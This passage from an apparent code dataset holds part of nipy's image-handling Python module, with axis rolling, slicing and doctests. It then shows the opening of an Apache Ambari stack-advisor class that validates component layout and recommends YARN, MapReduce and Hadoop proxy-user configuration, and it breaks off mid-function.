\"\"\"\n new_cmap = self.coordmap.renamed_domain(names_dict)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def renamed_reference(self, **names_dict):\n \"\"\" Return new image with renamed output (range) coordinates\n\n Coordinates renamed according to the dictionary\n\n Parameters\n ----------\n \\*\\*names_dict : dict\n with keys being old names, and values being new names\n\n Returns\n -------\n newimg : Image\n An Image with the same data, having its output coordinates renamed.\n\n Examples\n --------\n >>> data = np.random.standard_normal((11,9,4))\n >>> im = Image(data, AffineTransform.from_params('ijk', 'xyz', np.identity(4), 'domain', 'range'))\n >>> im_renamed_reference = im.renamed_reference(x='newx', y='newy')\n >>> print im_renamed_reference.reference\n CoordinateSystem(coord_names=('newx', 'newy', 'z'), name='range', coord_dtype=float64)\n \"\"\"\n new_cmap = self.coordmap.renamed_range(names_dict)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def __setitem__(self, index, value):\n \"\"\"Setting values of an image, set values in the data array.\"\"\"\n warnings.warn(\"Please don't use ``img[x] = y``; use \"\n \"``img.get_data()[x] = y`` instead\",\n DeprecationWarning,\n stacklevel=2)\n self._data[index] = value\n\n def __array__(self):\n \"\"\"Return data as a numpy array.\"\"\"\n warnings.warn('Please use get_data instead - will be deprecated',\n DeprecationWarning,\n stacklevel=2)\n return self.get_data()\n\n def get_data(self):\n \"\"\"Return data as a numpy array.\"\"\"\n return np.asanyarray(self._data)\n\n def __getitem__(self, slice_object):\n \"\"\" Slicing an image returns an Image.\n\n Parameters\n ----------\n slice_object: int, slice or sequence of slice\n An object representing a numpy 'slice'.\n\n Returns\n -------\n img_subsampled: Image\n An Image with data self.get_data()[slice_object] and an\n appropriately corrected CoordinateMap.\n\n Examples\n --------\n >>> from nipy.io.api import load_image\n >>> from nipy.testing import funcfile\n >>> im = load_image(funcfile)\n >>> frame3 = im[:,:,:,3]\n >>> np.allclose(frame3.get_data(), im.get_data()[:,:,:,3])\n True\n \"\"\"\n data = self.get_data()[slice_object]\n g = ArrayCoordMap(self.coordmap, self.shape)[slice_object]\n coordmap = g.coordmap\n if coordmap.function_domain.ndim > 0:\n return self.__class__.from_image(self,\n data=data,\n coordmap=coordmap)\n else:\n return data\n\n def __iter__(self):\n \"\"\" Images do not have default iteration\n\n This is because it's not obvious that axis 0 is the right axis to\n iterate over. For example, we often want to iterate over the time or\n volume axis, and this is more likely to be axis 3\n \"\"\"\n raise TypeError(\"Images do not have default iteration; \"\n \"you can use ``iter_axis(img, axis)`` instead.\")\n\n def __eq__(self, other):\n return (isinstance(other, self.__class__)\n and np.all(self.get_data() == other.get_data())\n and np.all(self.affine == other.affine)\n and (self.axes.coord_names == other.axes.coord_names))\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n options = np.get_printoptions()\n np.set_printoptions(precision=6, threshold=64, edgeitems=2)\n representation = \\\n 'Image(\\n data=%s,\\n coordmap=%s)' % (\n '\\n '.join(repr(self._data).split('\\n')),\n '\\n '.join(repr(self.coordmap).split('\\n')))\n np.set_printoptions(**options)\n return representation\n\n @classmethod\n def from_image(klass, img, data=None, coordmap=None, metadata=None):\n \"\"\" Classmethod makes new instance of this `klass` from instance `img`\n\n Parameters\n ----------\n data : array-like\n object that as attribute ``shape`` and returns an array from\n ``np.asarray(data)``\n coordmap : `AffineTransform` object\n coordmap mapping the domain (input) voxel axes of the image to the\n range (reference, output) axes - usually mm in real world space\n metadata : dict, optional\n Freeform metadata for image. Most common contents is ``header``\n from nifti etc loaded images.\n\n Returns\n -------\n img : `klass` instance\n New image with data from `data`, coordmap from `coordmap` maybe\n metadata from `metadata`\n\n Notes\n -----\n Subclasses of ``Image`` with different semantics for ``__init__`` will\n need to override this classmethod.\n\n Examples\n --------\n >>> from nipy import load_image\n >>> from nipy.core.api import Image\n >>> from nipy.testing import anatfile\n >>> aimg = load_image(anatfile)\n >>> arr = np.arange(24).reshape((2,3,4))\n >>> img = Image.from_image(aimg, data=arr)\n \"\"\"\n if data is None:\n data = img._data\n if coordmap is None:\n coordmap = copy(img.coordmap)\n if metadata is None:\n metadata = copy(img.metadata)\n return klass(data, coordmap, metadata)\n\n\nclass SliceMaker(object):\n \"\"\" This class just creates slice objects for image resampling\n\n It only has a __getitem__ method that returns its argument.\n\n XXX Wouldn't need this if there was a way\n XXX to do this\n XXX subsample(img, [::2,::3,10:1:-1])\n XXX\n XXX Could be something like this Subsample(img)[::2,::3,10:1:-1]\n \"\"\"\n def __getitem__(self, index):\n return index\n\nslice_maker = SliceMaker()\n\n\ndef subsample(img, slice_object):\n \"\"\" Subsample an image\n\n Please don't use this function, but use direct image slicing instead. That\n is, replace::\n\n frame3 = subsample(im, slice_maker[:,:,:,3])\n\n with::\n\n frame3 = im[:,:,:,3]\n\n Parameters\n ----------\n img : Image\n slice_object: int, slice or sequence of slice\n An object representing a numpy 'slice'.\n\n Returns\n -------\n img_subsampled: Image\n An Image with data img.get_data()[slice_object] and an appropriately\n corrected CoordinateMap.\n\n Examples\n --------\n >>> from nipy.io.api import load_image\n >>> from nipy.testing import funcfile\n >>> from nipy.core.api import subsample, slice_maker\n >>> im = load_image(funcfile)\n >>> frame3 = subsample(im, slice_maker[:,:,:,3])\n >>> np.allclose(frame3.get_data(), im.get_data()[:,:,:,3])\n True\n \"\"\"\n warnings.warn('subsample is deprecated, please use image '\n 'slicing instead (e.g. img[:,:,1]',\n DeprecationWarning,\n stacklevel=2)\n return img.__getitem__(slice_object)\n\n\ndef fromarray(data, innames, outnames):\n \"\"\"Create an image from array `data`, and input/output coordinate names\n\n The mapping between the input and output coordinate names is the identity\n matrix.\n\n Please don't use this routine, but instead prefer::\n\n from nipy.core.api import Image, AffineTransform\n img = Image(data, AffineTransform(innames, outnames, np.eye(4)))\n\n where ``4`` is ``len(innames) + 1``.\n\n Parameters\n ----------\n data : numpy array\n A numpy array of three dimensions.\n innames : sequence\n a list of input axis names\n innames : sequence\n a list of output axis names\n\n Returns\n -------\n image : An `Image` object\n\n See Also\n --------\n load : function for loading images\n save : function for saving images\n\n Examples\n --------\n >>> img = fromarray(np.zeros((2,3,4)), 'ijk', 'xyz')\n >>> img.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0.],\n [ 0., 1., 0., 0.],\n [ 0., 0., 1., 0.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n warnings.warn('fromarray is deprecated, please use the Image '\n 'constructor instead',\n DeprecationWarning,\n stacklevel=2)\n ndim = len(data.shape)\n coordmap = AffineTransform.from_start_step(innames,\n outnames,\n (0.,)*ndim,\n (1.,)*ndim)\n return Image(data, coordmap)\n\n\n@np.deprecate_with_doc('Please use rollimg instead')\ndef rollaxis(img, axis, inverse=False):\n \"\"\" Roll `axis` backwards, until it lies in the first position.\n\n It also reorders the reference coordinates by the same ordering.\n This is done to preserve a diagonal affine matrix if image.affine\n is diagonal. It also makes it possible to unambiguously specify\n an axis to roll along in terms of either a reference name (i.e. 'z')\n or an axis name (i.e. 'slice').\n\n This function is deprecated; please use ``rollimg`` instead.\n\n Parameters\n ----------\n img : Image\n Image whose axes and reference coordinates are to be reordered\n by rolling.\n axis : str or int\n Axis to be rolled, can be specified by name or as an integer.\n inverse : bool, optional\n If inverse is True, then axis must be an integer and the first axis is\n returned to the position axis. This keyword is deprecated and we'll\n remove it in a future version of nipy.\n\n Returns\n -------\n newimg : Image\n Image with reordered axes and reference coordinates.\n\n Examples\n --------\n >>> data = np.zeros((30,40,50,5))\n >>> affine_transform = AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1]))\n >>> im = Image(data, affine_transform)\n >>> im.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k', 'l'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0., 0.],\n [ 0., 2., 0., 0., 0.],\n [ 0., 0., 3., 0., 0.],\n [ 0., 0., 0., 4., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n >>> im_t_first = rollaxis(im, 't')\n >>> np.diag(im_t_first.affine)\n array([ 4., 1., 2., 3., 1.])\n >>> im_t_first.shape\n (5, 30, 40, 50)\n >>> im_t_first.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('l', 'i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('t', 'x', 'y', 'z'), name='', coord_dtype=float64),\n affine=array([[ 4., 0., 0., 0., 0.],\n [ 0., 1., 0., 0., 0.],\n [ 0., 0., 2., 0., 0.],\n [ 0., 0., 0., 3., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n \"\"\"\n if inverse not in (True, False):\n raise ValueError('Inverse should be True or False; did you mean to '\n 'use the ``rollimg` function instead?')\n if isinstance(axis, int) and axis < 0:\n axis = img.ndim + axis\n if inverse:\n if type(axis) != type(0):\n raise ValueError('If carrying out inverse rolling, '\n 'axis must be an integer')\n order = range(1, img.ndim)\n order.insert(axis, 0)\n return img.reordered_axes(order).reordered_reference(order)\n if axis not in (range(img.axes.ndim) +\n list(img.axes.coord_names) +\n list(img.reference.coord_names)):\n raise ValueError('axis must be an axis number,'\n 'an axis name or a reference name')\n # Find out which index axis corresonds to\n in_index = out_index = -1\n if type(axis) == type(''):\n try:\n in_index = img.axes.index(axis)\n except:\n pass\n try:\n out_index = img.reference.index(axis)\n except:\n pass\n if in_index > 0 and out_index > 0 and in_index != out_index:\n raise ValueError('ambiguous choice of axis -- it exists '\n 'both in as an axis name and a '\n 'reference name')\n if in_index >= 0:\n axis = in_index\n else:\n axis = out_index\n if axis == -1:\n axis += img.axes.ndim\n order = range(img.ndim)\n order.remove(axis)\n order.insert(0, axis)\n return img.reordered_axes(order).reordered_reference(order)\n\n\ndef rollimg(img, axis, start=0, fix0=True):\n \"\"\" Roll `axis` backwards in the inputs, until it lies before `start`\n\n Parameters\n ----------\n img : Image\n Image whose axes and reference coordinates are to be reordered by\n rollimg.\n axis : str or int\n Axis to be rolled, can be specified by name or as an integer. If an\n integer, axis is an input axis. If a name, can be name of input or\n output axis. If an output axis, we search for the closest matching\n input axis, and raise an AxisError if this fails.\n start : str or int, optional\n position before which to roll axis `axis`. Default to 0. Can again be\n an integer (input axis) or name of input or output axis.\n fix0 : bool, optional\n Whether to allow for zero scaling when searching for an input axis\n matching an output axis. Useful for images where time scaling is 0.\n\n Returns\n -------\n newimg : Image\n Image with reordered input axes and corresponding data.\n\n Examples\n --------\n >>> data = np.zeros((30,40,50,5))\n >>> affine_transform = AffineTransform('ijkl', 'xyzt', np.diag([1,2,3,4,1]))\n >>> im = Image(data, affine_transform)\n >>> im.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k', 'l'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0., 0.],\n [ 0., 2., 0., 0., 0.],\n [ 0., 0., 3., 0., 0.],\n [ 0., 0., 0., 4., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n >>> im_t_first = rollimg(im, 't')\n >>> im_t_first.shape\n (5, 30, 40, 50)\n >>> im_t_first.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('l', 'i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 0., 1., 0., 0., 0.],\n [ 0., 0., 2., 0., 0.],\n [ 0., 0., 0., 3., 0.],\n [ 4., 0., 0., 0., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n \"\"\"\n axis = input_axis_index(img.coordmap, axis, fix0)\n start = input_axis_index(img.coordmap, start, fix0)\n order = range(img.ndim)\n order.remove(axis)\n if axis < start:\n start -= 1\n order.insert(start, axis)\n return img.reordered_axes(order)\n\n\ndef iter_axis(img, axis, asarray=False):\n \"\"\" Return generator to slice an image `img` over `axis`\n\n Parameters\n ----------\n img : ``Image`` instance\n axis : int or str\n axis identifier, either name or axis number\n asarray : {False, True}, optional\n\n Returns\n -------\n g : generator\n such that list(g) returns a list of slices over `axis`. If `asarray` is\n `False` the slices are images. If `asarray` is True, slices are the\n data from the images.\n\n Examples\n --------\n >>> data = np.arange(24).reshape((4,3,2))\n >>> img = Image(data, AffineTransform('ijk', 'xyz', np.eye(4)))\n >>> slices = list(iter_axis(img, 'j'))\n >>> len(slices)\n 3\n >>> slices[0].shape\n (4, 2)\n >>> slices = list(iter_axis(img, 'k', asarray=True))\n >>> slices[1].sum() == data[:,:,1].sum()\n True\n \"\"\"\n rimg = rollimg(img, axis)\n for i in range(rimg.shape[0]):\n if asarray:\n yield rimg[i].get_data()\n else:\n yield rimg[i]\n\n\ndef synchronized_order(img, target_img,\n axes=True,\n reference=True):\n \"\"\" Reorder reference and axes of `img` to match target_img.\n\n Parameters\n ----------\n img : Image\n target_img : Image\n axes : bool, optional\n If True, synchronize the order of the axes.\n reference : bool, optional\n If True, synchronize the order of the reference coordinates.\n\n Returns\n -------\n newimg : Image\n An Image satisfying newimg.axes == target.axes (if axes == True),\n newimg.reference == target.reference (if reference == True).\n\n Examples\n --------\n >>> data = np.random.standard_normal((3,4,7,5))\n >>> im = Image(data, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1])))\n >>> im_scrambled = im.reordered_axes('iljk').reordered_reference('txyz')\n >>> im == im_scrambled\n False\n >>> im_unscrambled = synchronized_order(im_scrambled, im)\n >>> im == im_unscrambled\n True\n\n The images don't have to be the same shape\n\n >>> data2 = np.random.standard_normal((3,11,9,4))\n >>> im2 = Image(data, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1])))\n >>> im_scrambled2 = im2.reordered_axes('iljk').reordered_reference('xtyz')\n >>> im_unscrambled2 = synchronized_order(im_scrambled2, im)\n >>> im_unscrambled2.coordmap == im.coordmap\n True\n\n or have the same coordmap\n\n >>> data3 = np.random.standard_normal((3,11,9,4))\n >>> im3 = Image(data3, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,9,3,-2,1])))\n >>> im_scrambled3 = im3.reordered_axes('iljk').reordered_reference('xtyz')\n >>> im_unscrambled3 = synchronized_order(im_scrambled3, im)\n >>> im_unscrambled3.axes == im.axes\n True\n >>> im_unscrambled3.reference == im.reference\n True\n >>> im_unscrambled4 = synchronized_order(im_scrambled3, im, axes=False)\n >>> im_unscrambled4.axes == im.axes\n False\n >>> im_unscrambled4.axes == im_scrambled3.axes\n True\n >>> im_unscrambled4.reference == im.reference\n True\n \"\"\"\n # Caution, we can't just use target_img.reference because other subclasses\n # of Image may not have all axes in the .reference attribute.\n target_axes = target_img.axes # = target_img.coordmap.function_domain\n # the below not necessarily == target_image.reference\n target_reference = target_img.coordmap.function_range\n if axes:\n img = img.reordered_axes(target_axes.coord_names)\n if reference:\n img = img.reordered_reference(target_reference.coord_names)\n return img\n\n\ndef is_image(obj):\n ''' Returns true if this object obeys the Image API\n\n This allows us to test for something that is duck-typing an image.\n\n For now an array must have a 'coordmap' attribute, and a callable\n 'get_data' attribute.\n\n Parameters\n ----------\n obj : object\n object for which to test API\n\n Returns\n -------\n is_img : bool\n True if object obeys image API\n\n Examples\n --------\n >>> from nipy.testing import anatfile\n >>> from nipy.io.api import load_image\n >>> img = load_image(anatfile)\n >>> is_image(img)\n True\n >>> class C(object): pass\n >>> c = C()\n >>> is_image(c)\n False\n '''\n if not hasattr(obj, 'coordmap') or not hasattr(obj, 'metadata'):\n return False\n return callable(getattr(obj, 'get_data'))\n"} {"ext": "py", "sha": "1a2fa0d94235cb305d4326941f062b6b4474b851", "content": "#!/usr/bin/env ambari-python-wrap\n\"\"\"\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport re\nimport os\nimport sys\nimport socket\n\nfrom math import ceil, floor\n\nfrom resource_management.core.logger import Logger\nfrom resource_management.libraries.functions.mounted_dirs_helper import get_mounts_with_multiple_data_dirs\n\nfrom stack_advisor import DefaultStackAdvisor\n\n\nclass ODPi20StackAdvisor(DefaultStackAdvisor):\n\n def __init__(self):\n super(ODPi20StackAdvisor, self).__init__()\n Logger.initialize_logger()\n\n def getComponentLayoutValidations(self, services, hosts):\n \"\"\"Returns array of Validation objects about issues with hostnames components assigned to\"\"\"\n items = super(ODPi20StackAdvisor, self).getComponentLayoutValidations(services, hosts)\n\n # Validating NAMENODE and SECONDARY_NAMENODE are on different hosts if possible\n # Use a set for fast lookup\n hostsSet = set(super(ODPi20StackAdvisor, self).getActiveHosts([host[\"Hosts\"] for host in hosts[\"items\"]])) #[host[\"Hosts\"][\"host_name\"] for host in hosts[\"items\"]]\n hostsCount = len(hostsSet)\n\n componentsListList = [service[\"components\"] for service in services[\"services\"]]\n componentsList = [item for sublist in componentsListList for item in sublist]\n nameNodeHosts = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if component[\"StackServiceComponents\"][\"component_name\"] == \"NAMENODE\"]\n secondaryNameNodeHosts = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if component[\"StackServiceComponents\"][\"component_name\"] == \"SECONDARY_NAMENODE\"]\n\n # Validating cardinality\n for component in componentsList:\n if component[\"StackServiceComponents\"][\"cardinality\"] is not None:\n componentName = component[\"StackServiceComponents\"][\"component_name\"]\n componentDisplayName = component[\"StackServiceComponents\"][\"display_name\"]\n componentHosts = []\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n componentHosts = [componentHost for componentHost in component[\"StackServiceComponents\"][\"hostnames\"] if componentHost in hostsSet]\n componentHostsCount = len(componentHosts)\n cardinality = str(component[\"StackServiceComponents\"][\"cardinality\"])\n # cardinality types: null, 1+, 1-2, 1, ALL\n message = None\n if \"+\" in cardinality:\n hostsMin = int(cardinality[:-1])\n if componentHostsCount < hostsMin:\n message = \"At least {0} {1} components should be installed in cluster.\".format(hostsMin, componentDisplayName)\n elif \"-\" in cardinality:\n nums = cardinality.split(\"-\")\n hostsMin = int(nums[0])\n hostsMax = int(nums[1])\n if componentHostsCount > hostsMax or componentHostsCount < hostsMin:\n message = \"Between {0} and {1} {2} components should be installed in cluster.\".format(hostsMin, hostsMax, componentDisplayName)\n elif \"ALL\" == cardinality:\n if componentHostsCount != hostsCount:\n message = \"{0} component should be installed on all hosts in cluster.\".format(componentDisplayName)\n else:\n if componentHostsCount != int(cardinality):\n message = \"Exactly {0} {1} components should be installed in cluster.\".format(int(cardinality), componentDisplayName)\n\n if message is not None:\n items.append({\"type\": 'host-component', \"level\": 'ERROR', \"message\": message, \"component-name\": componentName})\n\n # Validating host-usage\n usedHostsListList = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if not self.isComponentNotValuable(component)]\n usedHostsList = [item for sublist in usedHostsListList for item in sublist]\n nonUsedHostsList = [item for item in hostsSet if item not in usedHostsList]\n for host in nonUsedHostsList:\n items.append( { \"type\": 'host-component', \"level\": 'ERROR', \"message\": 'Host is not used', \"host\": str(host) } )\n\n return items\n\n def getServiceConfigurationRecommenderDict(self):\n return {\n \"YARN\": self.recommendYARNConfigurations,\n \"MAPREDUCE2\": self.recommendMapReduce2Configurations,\n \"HDFS\": self.recommendHDFSConfigurations,\n \"HBASE\": self.recommendHbaseConfigurations,\n \"STORM\": self.recommendStormConfigurations,\n \"AMBARI_METRICS\": self.recommendAmsConfigurations,\n \"RANGER\": self.recommendRangerConfigurations\n }\n\n def recommendYARNConfigurations(self, configurations, clusterData, services, hosts):\n putYarnProperty = self.putProperty(configurations, \"yarn-site\", services)\n putYarnPropertyAttribute = self.putPropertyAttribute(configurations, \"yarn-site\")\n putYarnEnvProperty = self.putProperty(configurations, \"yarn-env\", services)\n nodemanagerMinRam = 1048576 # 1TB in mb\n if \"referenceNodeManagerHost\" in clusterData:\n nodemanagerMinRam = min(clusterData[\"referenceNodeManagerHost\"][\"total_mem\"]/1024, nodemanagerMinRam)\n putYarnProperty('yarn.nodemanager.resource.memory-mb', int(round(min(clusterData['containers'] * clusterData['ramPerContainer'], nodemanagerMinRam))))\n putYarnProperty('yarn.scheduler.minimum-allocation-mb', int(clusterData['ramPerContainer']))\n putYarnProperty('yarn.scheduler.maximum-allocation-mb', int(configurations[\"yarn-site\"][\"properties\"][\"yarn.nodemanager.resource.memory-mb\"]))\n putYarnEnvProperty('min_user_id', self.get_system_min_uid())\n\n sc_queue_name = self.recommendYarnQueue(services, \"yarn-env\", \"service_check.queue.name\")\n if sc_queue_name is not None:\n putYarnEnvProperty(\"service_check.queue.name\", sc_queue_name)\n\n containerExecutorGroup = 'hadoop'\n if 'cluster-env' in services['configurations'] and 'user_group' in services['configurations']['cluster-env']['properties']:\n containerExecutorGroup = services['configurations']['cluster-env']['properties']['user_group']\n putYarnProperty(\"yarn.nodemanager.linux-container-executor.group\", containerExecutorGroup)\n\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n if \"TEZ\" in servicesList:\n ambari_user = self.getAmbariUser(services)\n ambariHostName = socket.getfqdn()\n putYarnProperty(\"yarn.timeline-service.http-authentication.proxyuser.{0}.hosts\".format(ambari_user), ambariHostName)\n putYarnProperty(\"yarn.timeline-service.http-authentication.proxyuser.{0}.groups\".format(ambari_user), \"*\")\n old_ambari_user = self.getOldAmbariUser(services)\n if old_ambari_user is not None:\n putYarnPropertyAttribute(\"yarn.timeline-service.http-authentication.proxyuser.{0}.hosts\".format(old_ambari_user), 'delete', 'true')\n putYarnPropertyAttribute(\"yarn.timeline-service.http-authentication.proxyuser.{0}.groups\".format(old_ambari_user), 'delete', 'true')\n\n\n def recommendMapReduce2Configurations(self, configurations, clusterData, services, hosts):\n putMapredProperty = self.putProperty(configurations, \"mapred-site\", services)\n putMapredProperty('yarn.app.mapreduce.am.resource.mb', int(clusterData['amMemory']))\n putMapredProperty('yarn.app.mapreduce.am.command-opts', \"-Xmx\" + str(int(round(0.8 * clusterData['amMemory']))) + \"m\")\n putMapredProperty('mapreduce.map.memory.mb', clusterData['mapMemory'])\n putMapredProperty('mapreduce.reduce.memory.mb', int(clusterData['reduceMemory']))\n putMapredProperty('mapreduce.map.java.opts', \"-Xmx\" + str(int(round(0.8 * clusterData['mapMemory']))) + \"m\")\n putMapredProperty('mapreduce.reduce.java.opts', \"-Xmx\" + str(int(round(0.8 * clusterData['reduceMemory']))) + \"m\")\n putMapredProperty('mapreduce.task.io.sort.mb', min(int(round(0.4 * clusterData['mapMemory'])), 1024))\n mr_queue = self.recommendYarnQueue(services, \"mapred-site\", \"mapreduce.job.queuename\")\n if mr_queue is not None:\n putMapredProperty(\"mapreduce.job.queuename\", mr_queue)\n\n def getAmbariUser(self, services):\n ambari_user = services['ambari-server-properties']['ambari-server.user']\n if \"cluster-env\" in services[\"configurations\"] \\\n and \"ambari_principal_name\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\":\n ambari_user = services[\"configurations\"][\"cluster-env\"][\"properties\"][\"ambari_principal_name\"]\n ambari_user = ambari_user.split('@')[0]\n return ambari_user\n\n def getOldAmbariUser(self, services):\n ambari_user = None\n if \"cluster-env\" in services[\"configurations\"]:\n if \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\":\n ambari_user = services['ambari-server-properties']['ambari-server.user']\n elif \"ambari_principal_name\" in services[\"configurations\"][\"cluster-env\"][\"properties\"]:\n ambari_user = services[\"configurations\"][\"cluster-env\"][\"properties\"][\"ambari_principal_name\"]\n ambari_user = ambari_user.split('@')[0]\n return ambari_user\n\n def recommendAmbariProxyUsersForHDFS(self, services, servicesList, putCoreSiteProperty, putCoreSitePropertyAttribute):\n if \"HDFS\" in servicesList:\n ambari_user = self.getAmbariUser(services)\n ambariHostName = socket.getfqdn()\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.hosts\".format(ambari_user), ambariHostName)\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.groups\".format(ambari_user), \"*\")\n old_ambari_user = self.getOldAmbariUser(services)\n if old_ambari_user is not None:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.hosts\".format(old_ambari_user), 'delete', 'true')\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.groups\".format(old_ambari_user), 'delete', 'true')\n\n def recommendHadoopProxyUsers (self, configurations, services, hosts):\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n users = {}\n\n if 'forced-configurations' not in services:\n services[\"forced-configurations\"] = []\n\n if \"HDFS\" in servicesList:\n hdfs_user = None\n if \"hadoop-env\" in services[\"configurations\"] and \"hdfs_user\" in services[\"configurations\"][\"hadoop-env\"][\"properties\"]:\n hdfs_user = services[\"configurations\"][\"hadoop-env\"][\"properties\"][\"hdfs_user\"]\n if not hdfs_user in users and hdfs_user is not None:\n users[hdfs_user] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"hadoop-env\", \"propertyName\" : \"hdfs_user\"}\n\n if \"OOZIE\" in servicesList:\n oozie_user = None\n if \"oozie-env\" in services[\"configurations\"] and \"oozie_user\" in services[\"configurations\"][\"oozie-env\"][\"properties\"]:\n oozie_user = services[\"configurations\"][\"oozie-env\"][\"properties\"][\"oozie_user\"]\n oozieServerrHosts = self.getHostsWithComponent(\"OOZIE\", \"OOZIE_SERVER\", services, hosts)\n if oozieServerrHosts is not None:\n oozieServerHostsNameList = []\n for oozieServerHost in oozieServerrHosts:\n oozieServerHostsNameList.append(oozieServerHost[\"Hosts\"][\"host_name\"])\n oozieServerHostsNames = \",\".join(oozieServerHostsNameList)\n if not oozie_user in users and oozie_user is not None:\n users[oozie_user] = {\"propertyHosts\" : oozieServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"oozie-env\", \"propertyName\" : \"oozie_user\"}\n\n hive_user = None\n if \"HIVE\" in servicesList:\n webhcat_user = None\n if \"hive-env\" in services[\"configurations\"] and \"hive_user\" in services[\"configurations\"][\"hive-env\"][\"properties\"] \\\n and \"webhcat_user\" in services[\"configurations\"][\"hive-env\"][\"properties\"]:\n hive_user = services[\"configurations\"][\"hive-env\"][\"properties\"][\"hive_user\"]\n webhcat_user = services[\"configurations\"][\"hive-env\"][\"properties\"][\"webhcat_user\"]\n hiveServerHosts = self.getHostsWithComponent(\"HIVE\", \"HIVE_SERVER\", services, hosts)\n hiveServerInteractiveHosts = self.getHostsWithComponent(\"HIVE\", \"HIVE_SERVER_INTERACTIVE\", services, hosts)\n webHcatServerHosts = self.getHostsWithComponent(\"HIVE\", \"WEBHCAT_SERVER\", services, hosts)\n\n if hiveServerHosts is not None:\n hiveServerHostsNameList = []\n for hiveServerHost in hiveServerHosts:\n hiveServerHostsNameList.append(hiveServerHost[\"Hosts\"][\"host_name\"])\n # Append Hive Server Interactive host as well, as it is Hive2/HiveServer2 component.\n if hiveServerInteractiveHosts:\n for hiveServerInteractiveHost in hiveServerInteractiveHosts:\n hiveServerInteractiveHostName = hiveServerInteractiveHost[\"Hosts\"][\"host_name\"]\n if hiveServerInteractiveHostName not in hiveServerHostsNameList:\n hiveServerHostsNameList.append(hiveServerInteractiveHostName)\n Logger.info(\"Appended (if not exiting), Hive Server Interactive Host : '{0}', to Hive Server Host List : '{1}'\".format(hiveServerInteractiveHostName, hiveServerHostsNameList))\n\n hiveServerHostsNames = \",\".join(hiveServerHostsNameList) # includes Hive Server interactive host also.\n Logger.info(\"Hive Server and Hive Server Interactive (if enabled) Host List : {0}\".format(hiveServerHostsNameList))\n if not hive_user in users and hive_user is not None:\n users[hive_user] = {\"propertyHosts\" : hiveServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"hive-env\", \"propertyName\" : \"hive_user\"}\n\n if webHcatServerHosts is not None:\n webHcatServerHostsNameList = []\n for webHcatServerHost in webHcatServerHosts:\n webHcatServerHostsNameList.append(webHcatServerHost[\"Hosts\"][\"host_name\"])\n webHcatServerHostsNames = \",\".join(webHcatServerHostsNameList)\n if not webhcat_user in users and webhcat_user is not None:\n users[webhcat_user] = {\"propertyHosts\" : webHcatServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"hive-env\", \"propertyName\" : \"webhcat_user\"}\n\n if \"YARN\" in servicesList:\n yarn_user = None\n if \"yarn-env\" in services[\"configurations\"] and \"yarn_user\" in services[\"configurations\"][\"yarn-env\"][\"properties\"]:\n yarn_user = services[\"configurations\"][\"yarn-env\"][\"properties\"][\"yarn_user\"]\n rmHosts = self.getHostsWithComponent(\"YARN\", \"RESOURCEMANAGER\", services, hosts)\n\n if len(rmHosts) > 1:\n rmHostsNameList = []\n for rmHost in rmHosts:\n rmHostsNameList.append(rmHost[\"Hosts\"][\"host_name\"])\n rmHostsNames = 